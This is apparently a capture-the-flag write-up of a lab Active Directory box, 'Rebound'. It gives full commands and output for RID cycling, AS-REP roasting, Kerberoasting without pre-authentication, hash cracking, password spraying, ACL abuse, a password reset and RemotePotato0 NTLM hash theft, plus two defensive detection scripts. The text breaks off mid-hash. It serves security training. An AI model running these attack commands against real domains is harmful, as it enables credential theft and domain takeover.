Rebound

A Windows machine that comprises a multitude of AD vulnerabilities.

Enumeration

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ sudo nmap -sC -sV -Pn 10.10.11.231
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 23:27 EST
Nmap scan report for rebound.htb (10.10.11.231)
Host is up (0.053s latency).
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-24 11:27:38Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:26+00:00; +7h00m01s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-12-24T11:28:27+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:26+00:00; +7h00m01s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:27+00:00; +7h00m01s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb2-time: 
|   date: 2023-12-24T11:28:20
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.41 seconds

Enumerating SMB and LDAP yielded nothing, but I was able to connect to SMB unauthenticated (as Guest, with no permissions) using rpcclient, so I proceeded to enumerate potential users with RID cycling.

┌──(kali㉿kali)-[~/Desktop/CTF/Windows Stuff]
└─$ crackmapexec smb 10.10.11.231 -u "Guest" -p ''
SMB         10.10.11.231    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.231    445    DC01             [+] rebound.htb\Guest:
┌──(kali㉿kali)-[~/Desktop/CTF/Windows Stuff]
└─$ ridenum 10.10.11.231 0 20000 Guest ''
[*] Attempting lsaquery first...This will enumerate the base domain SID
[*] Successfully enumerated base domain SID. Printing information: 
Domain Name: rebound
Domain Sid: S-1-5-21-4078382237-1492182817-2568127209
[*] Moving on to extract via RID cycling attack.. 
[*] Enumerating user accounts.. This could take a little while.
Account name: rebound\Administrator
Account name: rebound\Guest
Account name: rebound\krbtgt
Account name: rebound\DC01$
Account name: rebound\ppaul
Account name: rebound\llune
Account name: rebound\fflock
Account name: rebound\jjones
Account name: rebound\mmalone
Account name: rebound\nnoon
Account name: rebound\ldap_monitor
Account name: rebound\oorend
Account name: rebound\winrm_svc
Account name: rebound\batch_runner
Account name: rebound\tbrady
Account name: rebound\delegator$
[*] RIDENUM has finished enumerating user accounts...

I then tried AS-REP roasting, hoping for a quick win for initial access, but could not crack the hash, which probably meant this was not the intended path.

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-GetNPUsers -dc-ip 10.10.11.231 -request -format hashcat -usersfile users.txt rebound.htb/
Impacket v0.11.0 - Copyright 2023 Fortra

$krb5asrep$23$jjones@REBOUND.HTB:06a2bf6dd3cfdb587387c2d53bf69a0c$f3b60b15f622dbbde4153402b6320449e99e574a4f5c691fe415cec470cb8f52c3d4d3ae1d2c0029b23f7cab1751aaa493cf48c63c93358774333705ee62c827d33ee30503a81955ae1105ba4532d106c8ec07611af9c23b3d43a57f12c92f9cac5cb1c13a0f3576dde3fa29b2e1e484c227e615ea196a9fef98a31c552767e2b73892228cf77e55607adc1fb82712d39537f5c88db47c8e12c1d713789de07c6f561d5a86f0cbecf54c9e7232355c8af83c69aa60fc54915019b7e965496a5b15fa6dbfc45a9df367033a9233bf20a64b7aa8356fc300f9c906cef1c308b33a58c01057f3b332638f1b
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ hashcat jjones_asrep_hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
...
Approaching final keyspace - workload adjusted.           

Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$jjones@REBOUND.HTB:06a2bf6dd3cfdb5873...638f1b
Time.Started.....: Sat Dec 23 23:39:49 2023 (13 secs)
Time.Estimated...: Sat Dec 23 23:40:02 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1270.6 kH/s (0.86ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 59%

Started: Sat Dec 23 23:39:31 2023
Stopped: Sat Dec 23 23:40:04 2023

After a very long time, I stumbled across this article on Kerberoasting without pre-authentication. Similar to AS-REP roasting, the technique leverages two things we already have.

To keep myself sane from all the impacket branch errors I was receiving, I decided to use a Windows VM and perform the exploit using Rubeus and its /nopreauth parameter.

PS C:\Users\nicholas\Desktop > ./Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"rebound.htb" /dc:"DC01.rebound.htb" /nopreauth:"jjones"  /spns:C:\Users\nicholas\Desktop\users.txt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.1


[*] Action: Kerberoasting

[*] Using jjones without pre-auth to request service tickets

[*] Target SPN             : Administrator
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : Guest
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : krbtgt
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt

[*] Target SPN             : DC01$
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt

[*] Target SPN             : ppaul
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : llune
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : fflock
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : jjones
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : mmalone
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : nnoon
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : ldap_monitor
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt

[*] Target SPN             : oorend
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : winrm_svc
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : batch_runner
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : tbrady
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : delegator$
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Roasted hashes written to : C:\Users\nicholas\Desktop\kerberoastables.txt
Commando VM 01/19/2024 04:32:31

We can now try to crack these hashes using hashcat and rockyou, which gives us the password of ldap_monitor.

PS C:\Users\Admin\Downloads\hashcat-6.2.6\hashcat-6.2.6> .\hashcat.exe .\kerberoastables.txt .\rockyou.txt -m 13100
hashcat (v6.2.6) starting

Successfully initialized the NVIDIA main driver CUDA runtime library.

Failed to initialize NVIDIA RTC library.

* Device #1: CUDA SDK Toolkit not installed or incorrectly installed.
             CUDA SDK Toolkit required for proper device support and utilization.
             Falling back to OpenCL runtime.

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 3.0 CUDA 12.2.68) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #1: NVIDIA GeForce RTX 3060 Ti, 8064/8191 MB (2047 MB allocatable), 38MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashfile '.\kerberoastables.txt' on line 1 ($krb5t...4D5680553C119B86D292DEFCDD2440D3): Separator unmatched
Hashfile '.\kerberoastables.txt' on line 2 ($krb5t...7605771D47A8BAF35BE68F999FEB075C): Separator unmatched
Hashfile '.\kerberoastables.txt' on line 4 ($krb5t...DF98A1F9E012EF7C76CB77E5571E4F16): Separator unmatched
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 333 MB

Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

$krb5tgs$23$*ldap_monitor$rebound.htb$ldap_monitor*$bf482204b205a0ec5544a9c3efc7fd0b$eefbb2ffa6ccb05ad554d7e2116f87de4da6bfd4617f19aa1e83a4d3ecc700cafca0f3b2fa2f7840398ed5a12bbba7c5ec5a61e98b7876a2b2b8c9d5c874a269df71e6801167ed703dddd4cf661cc11242efbab0d581b1fe8b2bbe8798330f912621d5a2cf34fce238c66b7f2fb20c37e2045ceccb2f89bc0a551ddfb43d024e3dc993e20d509da1905c813a48370672e5a372fd5995eb0698d0ee6211aa7835be9b95df254c90fbcc2015bbc158d6dd91eac729adf9e3fee4d31fa7a26b9caefaf07f2fe6e76702b8e6dc359e20d83e9cf7b99ba3684e900fd38bf7645534499cb23b0d973ac95f0b70deca3364a07d2775aaf51c27d2f92df7a8c8199ba1bfff9ed404c964f1eed2b376b09c4e190c3f9ddff8276ccddd1ae9829f88054efc27ffac6e475d67a5a838da89e0aac61d8011dea6058238693d9390213eeb0b9e1e7637cb1b4d0c27ced6bfd17e2abfdd72b13cc50138be85951f9fc5a9583d8c2dd039a3325a25395a579ee122412342fa79827cd8a2743658f3ee0cd281e6e83b5b36d15ba27479c7276a4b58a8b9238aae7ff579ea72aaab0bdd3cb640f9a39df96a2b211dffb09b0a88940d6654bcd2de4daaeb69c0c35b0dc5ba88588ede34e4e26ea776b893e317c0691fbadad090d7b38dbabf32b37b7bc4bd32e6dabb3a3709727d18af0df99423ad2e81d40f0cef7adb272df4d536d2802fdf201f0ac05019194fb38b0dc60d4f9d284afdeea1be32265e9cedc3e360a6be7ffa08a1261beb933c049af1d9e8f8dda59e2c1cd3c7186422456f7ef52c2e42641aad761ea94f2d1837a477fceff40b6abc9eb9f6d7e6467ded8925d36dc54ff2a4cf567df708273e72f1e33e4cf8f194e339071a080c525af589811eac49e64776f492dbfdf9f32e63dd574bc6c5efabfa7fe28148cac01be172adde18e2105b1c56a048cc134726cbb8baa744de0c32fb2c5022d43da79e3d3632b3d2c7d75b419802ce3110883cfc19e9a65f01b4006edb7e0ea889ed43ef9b073abb091da9db9114bc60a37fb0075d1856c2715a31fd87f826b499997d703ab68f383c67c2d325189210f9fe00c2f40c46c771b04008384fa019cd2b2264aeb01de837a60a0bdd3a0e24b971c8a95d834d89c954bd1c02b0b5538863dcaa15e16f5d848227305cb24d65ca106f30ce49c3928cdf96ccf595b8247564d2af9744023a83f9b8ba0a28672e766def4de9a07b9d297bbd9d28c7264f110ca063f0a44cd71547418240a9fa0711b4b0289057d123cb85d6db5b50e08fdcd844dfb8ac8aa94baabfceda9df0c9599d874878d30f3679a2f26a9fa2df65c6289593cade54:1GR8t@$$4u

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ldap_monitor$rebound.htb$ldap_monitor*...cade54
Time.Started.....: Fri Jan 19 20:40:48 2024 (1 sec)
Time.Estimated...: Fri Jan 19 20:40:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 18875.9 kH/s (6.48ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 13697024/14344384 (95.49%)
Rejected.........: 0/13697024 (0.00%)
Restore.Point....: 12451840/14344384 (86.81%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 40432330 -> 0860478331
Hardware.Mon.#1..: Temp: 61c Fan: 69% Util: 29% Core:1995MHz Mem:6800MHz Bus:16

Started: Fri Jan 19 20:40:46 2024
Stopped: Fri Jan 19 20:40:49 2024
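Both roasting variants above leave traces on the domain controller. The following triage script is an added example (not code from the post, Rubeus, impacket or hashcat) that runs over constructed Windows Security events 4768/4769: it flags an AS-REQ answered without pre-authentication, an AS-REQ whose service name is not krbtgt (the /nopreauth Kerberoast), and a burst of RC4-encrypted ticket requests from one client. Field names follow the Windows events; the window and threshold are assumptions.

```python
"""Triage Windows Kerberos events (4768 AS-REQ, 4769 TGS-REQ) for roasting activity.

Added example for this writeup; it is not code from the original post or from
Rubeus, impacket or hashcat. The records below are constructed to mirror the
field names of the Windows Security events, and the thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime

RC4_HMAC = "0x17"   # etype 23: what hashcat modes 13100 (TGS-REP) and 18200 (AS-REP) crack
NO_PREAUTH = "0"    # PreAuthType 0: the KDC answered without any pre-authentication


def _ev(event_id, time, user, service, preauth, etype, ip):
    """Build one constructed event record using the Windows event field names."""
    return {"EventID": event_id, "Time": time, "TargetUserName": user, "ServiceName": service,
            "PreAuthType": preauth, "TicketEncryptionType": etype, "IpAddress": ip}


SAMPLE_EVENTS = [                                                                    # constructed sample log
    _ev(4768, "2023-12-24T11:20:00", "ppaul", "krbtgt", "2", "0x12", "10.10.11.50"),            # normal AES logon
    _ev(4769, "2023-12-24T11:20:05", "ppaul", "DC01$", "-", "0x12", "10.10.11.50"),             # normal AES TGS
    _ev(4768, "2023-12-24T11:30:00", "jjones", "krbtgt", NO_PREAUTH, RC4_HMAC, "10.10.14.5"),  # AS-REP roast
    _ev(4768, "2023-12-24T11:31:00", "jjones", "ldap_monitor", NO_PREAUTH, RC4_HMAC, "10.10.14.5"),
    _ev(4768, "2023-12-24T11:31:01", "jjones", "DC01$", NO_PREAUTH, RC4_HMAC, "10.10.14.5"),
    _ev(4768, "2023-12-24T11:31:02", "jjones", "delegator$", NO_PREAUTH, RC4_HMAC, "10.10.14.5"),
    _ev(4769, "2023-12-24T11:40:00", "mmalone", "ldap_monitor", "-", RC4_HMAC, "10.10.11.60"),  # one-off RC4 TGS
]


def triage_event(ev):
    """Return the rule names that fire on a single event (empty list if benign)."""
    hits = []
    if ev["EventID"] == 4768 and ev["PreAuthType"] == NO_PREAUTH:
        if ev["ServiceName"].lower() != "krbtgt":
            # An AS-REQ normally names krbtgt. A service account here means the
            # client received a ticket encrypted with that service's key without
            # ever proving a password: the /nopreauth Kerberoast shown above.
            hits.append("ASREQ_FOR_SERVICE_WITHOUT_PREAUTH")
        elif ev["TicketEncryptionType"] == RC4_HMAC:
            hits.append("ASREP_ROAST_CANDIDATE")   # the GetNPUsers pattern
    if ev["EventID"] == 4769 and ev["TicketEncryptionType"] == RC4_HMAC:
        hits.append("RC4_SERVICE_TICKET")          # the classic Kerberoast pattern
    return hits


def roast_bursts(events, window_seconds=300, min_services=3):
    """Map client IP -> sorted service names for clients that obtained RC4-encrypted
    tickets for at least `min_services` distinct services inside one time window.
    Window and threshold are assumptions; tune them to the environment."""
    per_ip = defaultdict(list)
    for ev in events:
        service_ticket = ev["EventID"] == 4769 or ev["ServiceName"].lower() != "krbtgt"
        if ev["TicketEncryptionType"] == RC4_HMAC and service_ticket:
            per_ip[ev["IpAddress"]].append((datetime.fromisoformat(ev["Time"]), ev["ServiceName"]))
    bursts = {}
    for ip, requests in per_ip.items():
        requests.sort()
        for i, (start, _) in enumerate(requests):
            in_window = {svc for t, svc in requests[i:] if (t - start).total_seconds() <= window_seconds}
            if len(in_window) >= min_services:
                bursts[ip] = sorted(in_window)
                break
    return bursts


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for rule in triage_event(ev):
            print(f"{ev['Time']} {ev['IpAddress']:<12} {ev['TargetUserName']:<8} -> {ev['ServiceName']:<13} {rule}")
    for ip, services in roast_bursts(SAMPLE_EVENTS).items():
        print(f"burst from {ip}: {len(services)} services in 5 min: {', '.join(services)}")
```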

Initial Foothold

After obtaining domain credentials, I proceeded to map the domain using BloodHound and found a route for lateral movement to user access, but not from the users we have on hand.

From the graph above, our main goal is either to

  1. Obtain either PPAUL or FFLOCK user account OR

  2. Enroll ourselves as a group member of SERVICEMGMT somehow

Obtain either PPAUL or FFLOCK user account

Using the password obtained from ldap_monitor's account, I performed password spraying with crackmapexec and got a match on the user oorend.

┌──(kali㉿kali)-[~/…/CTF/Boxes/Rebound/impacket-master]
└─$ crackmapexec smb rebound.htb -u ../users.lst -p '1GR8t@$$4u' --continue-on-success
SMB         dc01.rebound.htb 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\Administrator:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\Guest:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\krbtgt:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\ppaul:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\llune:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\fflock:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\jjones:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\mmalone:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\nnoon:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [+] rebound.htb\ldap_monitor:1GR8t@$$4u 
SMB         dc01.rebound.htb 445    DC01             [+] rebound.htb\oorend:1GR8t@$$4u 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\winrm_svc:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\batch_runner:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\tbrady:1GR8t@$$4u STATUS_LOGON_FAILURE 

Sadly, the password spraying did not work on either PPAUL or FFLOCK.

Enroll ourselves as a group member of SERVICEMGMT somehow

I then remembered that some ACL permissions are not explicitly shown in BloodHound and must be enumerated explicitly using something like PowerView's FindDomainObjectAcl. However, I kept receiving the error "Server not operational".

I then struggled to find a Linux alternative until I finally stumbled across impacket's dacledit, which lets me enumerate whether the principal oorend has any permissions over the target SERVICEMGMT group.

┌──(kali㉿kali)-[~/…/Boxes/Rebound/impacket-master/examples]
└─$ python3 ./dacledit.py -action read -target SERVICEMGMT -principal oorend -dc-ip 10.10.11.231 rebound.htb/'oorend':'1GR8t@$$4u' -use-ldaps  -k
Impacket v0.12.0.dev1 - Copyright 2023 Fortra


[-] CCache file is not found. Skipping...
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-4078382237-1492182817-2568127209-7682)
[*]   ACE[2] info                
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : None
[*]     Access mask               : Self (0x8)
[*]     Trustee (SID)             : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)

Success! We now know that oorend has the Self permission, meaning the account can add itself to the SERVICEMGMT group.

We can easily do that using bloodyAD's AddGroupMember functionality.

┌─[sg-free-1]─[10.10.14.122]─[NicholasSoh@htb-x8h8zosurg]─[~/Desktop]
└──╼ [★]$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host 10.10.11.231 add groupMember SERVICEMGMT oorend
[+] CN=oorend,CN=Users,DC=rebound,DC=htb added to CN=SERVICEMGMT,CN=USERS,DC=REBOUND,DC=HTB

Referring back to the BloodHound graph, the SERVICEMGMT group has GenericAll (Full Control) over the OU SERVICE USERS.

Once again, we can use impacket's dacledit to grant oorend full control over that OU.

┌──(kali㉿kali)-[~/…/Boxes/Rebound/impacket-master/examples]
└─$ python3 dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'oorend' -target-dn 'OU=SERVICE USERS,DC=REBOUND,DC=HTB'  rebound.htb/'oorend':'1GR8t@$$4u' -dc-ip 10.10.11.231 -k -use-ldaps
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240119-175009.bak
[*] DACL modified successfully!
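Both ACEs used above (Self on SERVICEMGMT, FullControl on the SERVICE USERS OU) are plain access masks. The following is an added example, not code from dacledit or bloodyAD, that decodes such masks into named rights and audits constructed ACE records for abusable grants to non-privileged trustees; the domain SID and oorend's RID come from the output above, while the Domain Admins and Authenticated Users ACEs are constructed for contrast.

```python
"""Decode Active Directory ACE access masks and flag rights a low-privileged
trustee should not hold on a group or OU.

Added example for this writeup, not code from impacket's dacledit or bloodyAD.
The bit values are the ADS_RIGHTS_ENUM constants; the ACE records are constructed
to mirror the Self ACE found on SERVICEMGMT and the FullControl ACE written on
the SERVICE USERS OU, plus two benign ACEs for contrast.
"""
ADS_RIGHTS = {
    0x00000001: "CreateChild",   0x00000002: "DeleteChild",  0x00000004: "ListChildren",
    0x00000008: "Self",          0x00000010: "ReadProperty", 0x00000020: "WriteProperty",
    0x00000040: "DeleteTree",    0x00000080: "ListObject",   0x00000100: "ControlAccess",
    0x00010000: "Delete",        0x00020000: "ReadControl",  0x00040000: "WriteDacl",
    0x00080000: "WriteOwner",    0x10000000: "GenericAll",   0x20000000: "GenericExecute",
    0x40000000: "GenericWrite",  0x80000000: "GenericRead",
}
FULL_CONTROL = 0x000F01FF   # all nine DS-specific rights plus Delete/ReadControl/WriteDacl/WriteOwner

# Rights that let the trustee change the object's membership, attributes or its DACL.
ABUSABLE = {"Self", "WriteProperty", "WriteDacl", "WriteOwner", "GenericAll", "GenericWrite"}

DOMAIN_SID = "S-1-5-21-4078382237-1492182817-2568127209"        # from the ridenum output above
PRIVILEGED = {f"{DOMAIN_SID}-512", "S-1-5-32-544", "S-1-5-18"}  # Domain Admins, Administrators, SYSTEM

# Constructed ACE records: (object, class, ace_type, mask, trustee_sid, trustee_name).
SAMPLE_ACES = [
    ("SERVICEMGMT", "group", "ACCESS_ALLOWED_ACE", 0x14, "S-1-5-11", "Authenticated Users"),  # Read + List
    ("SERVICEMGMT", "group", "ACCESS_ALLOWED_ACE", FULL_CONTROL, f"{DOMAIN_SID}-512", "Domain Admins"),
    ("SERVICEMGMT", "group", "ACCESS_ALLOWED_ACE", 0x8, f"{DOMAIN_SID}-7682", "oorend"),
    ("OU=SERVICE USERS", "organizationalUnit", "ACCESS_ALLOWED_ACE", FULL_CONTROL, f"{DOMAIN_SID}-7682", "oorend"),
]


def decode_mask(mask):
    """Expand an ACCESS_MASK into its named rights, lowest bit first."""
    return [name for bit, name in sorted(ADS_RIGHTS.items()) if mask & bit]


def explain(right, obj_class):
    """Say why a right matters on this class of object (only the cases this page shows)."""
    if right == "Self" and obj_class == "group":
        return "validated write: trustee can add or remove itself as a member"
    if right in ("FullControl", "GenericAll", "WriteDacl", "WriteOwner") and obj_class == "organizationalUnit":
        return "inheritable control over every object in the OU (password resets, attribute edits)"
    return f"{right} granted to a non-privileged trustee"


def audit_dacl(aces, privileged=PRIVILEGED):
    """Return (object, trustee, strongest_right, explanation) for allow ACEs that
    hand abusable rights to trustees outside the privileged set."""
    findings = []
    for obj, obj_class, ace_type, mask, sid, name in aces:
        if ace_type != "ACCESS_ALLOWED_ACE" or sid in privileged:
            continue
        risky = [r for r in decode_mask(mask) if r in ABUSABLE]
        if not risky:
            continue
        # Full control subsumes the rest, so report the strongest right only once.
        full = (mask & FULL_CONTROL) == FULL_CONTROL or "GenericAll" in risky
        strongest = "FullControl" if full else risky[-1]
        findings.append((obj, name, strongest, explain(strongest, obj_class)))
    return findings


if __name__ == "__main__":
    for obj, trustee, right, why in audit_dacl(SAMPLE_ACES):
        print(f"{obj:<18} {trustee:<8} {right:<12} {why}")
```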

As oorend, we now have full control over the OU Service Users and, through inheritance, over winrm_svc.

We can now change winrm_svc's password using rpcclient and then PS-Remote in to get the user flag.

└─$ rpcclient -U  rebound.htb/oorend rebound.htb
Password for [REBOUND.HTB\oorend]:
rpcclient $> setuserinfo2 winrm_svc P@ssw0rd
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 winrm_svc 23 P@ssw0rd
rpcclient $> 

Privilege Escalation

Using query user, we see that the user tbrady is logged on.

PS C:\Users\winrm_svc>
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 tbrady                console             1  Active      none   25/11/2023 8:24 AM

For some reason, the same command no longer gives me this output as of 20/1/2024.

PS C:\Users\winrm_svc\Documents> query user
No User exists for *

From here, we can use RemotePotato0, which lets us capture the NTLMv2 hash of any user logged on to the target machine, in this case tbrady.

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999

PS C:\Users\winrm_svc\Documents> .\RemotePotato0.exe -m 2 -x 10.10.16.17 -p 9999 -s 1
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (nul
l) to your victim machine on port 9999
[*] Example Network redirector:
        sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written: 104 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] User hash stolen!

NTLMv2 Client   : DC01
NTLMv2 Username : rebound\tbrady
NTLMv2 Hash     : tbrady::rebound:25cb25d078aa7cda:5d015a1e05ab333b0fc68d64bd26e5c7:01010000000000004c7bf203dc4bda0194875567cf8b3e9e0000000002000e00720
0650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e
0064002e00680074006200050016007200650062006f0075006e0064002e00680074006200070008004c7bf203dc4bda0106000400060000000800300030000000000000000100000000200
